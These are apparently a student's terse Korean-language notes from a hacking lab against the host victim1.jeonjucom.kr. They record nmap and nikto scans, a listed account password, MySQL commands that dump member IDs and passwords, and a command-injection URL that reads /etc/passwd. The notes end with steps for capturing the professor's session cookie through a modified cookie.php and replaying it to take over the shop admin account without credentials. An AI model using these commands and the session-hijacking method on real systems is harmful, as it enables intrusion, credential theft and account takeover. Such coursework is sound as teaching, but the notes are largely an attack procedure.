nslookup victim1.jeonjucom.kr
명령어:
nmap -v -A victim1.jeonjucom.kr
열려있는 포트:
23, 80, 135, 139, 445, 903, 3306
AutoAttack.py 수정 사항:
명령어:
nikto -host victim1.jeonjucom.kr
결과: 옛날 버전 사용중 (업데이트 필요)
업데이트가 중요하며, 업데이트를 안 하면 해킹 위험이 높아짐.
접속 URL: http://victim1.jeonjucom.kr/~board
사용자 계정명: board
예시: root > geumsol.kr → http://geumsol.kr/~geumsol
board0632249253
cd /usr/local
cd mysql/
cd bin/
./mysql
설명: 소스 설치 상태, 보통 /usr/local에 설치됨.
show databases;
use shop;
show tables;
select user_id, password, level from paran_board_member;
admin 계정의 비밀번호는 MD5가 아닌 다른 암호화 함수 사용됨
~board/cool/test/yes.PHP?dir=cat /etc/passwd데이터베이스 파일 위치: /nayamall/inc/connect.inc
샵관리자가 되고 싶으면:
▲ header 부분
▲ templetes/def/head.html (로그인 메뉴)
▲ templetes/def/menu.html (뚫려있음)
▲ nayamall/login_check.php
▲ nayamall/paran_v10/lib.inc
▲ nayamall/class/pess.inc (세션은 서버에 저장되어 있어서 못 가져오므로 PC에 저장되는 쿠키로 넣음)
▲ 0 : Pession_ID 값을 쿠키로 구워짐
▲ 스크립트 순서
▲ cookie.php 수정
▲ data.txt에 교수님 세션값이 들어옴
▲ 교수님 쿠키값 넣어주면 (Cookie Editor) 아이디, 비밀번호 몰라도 변경 가능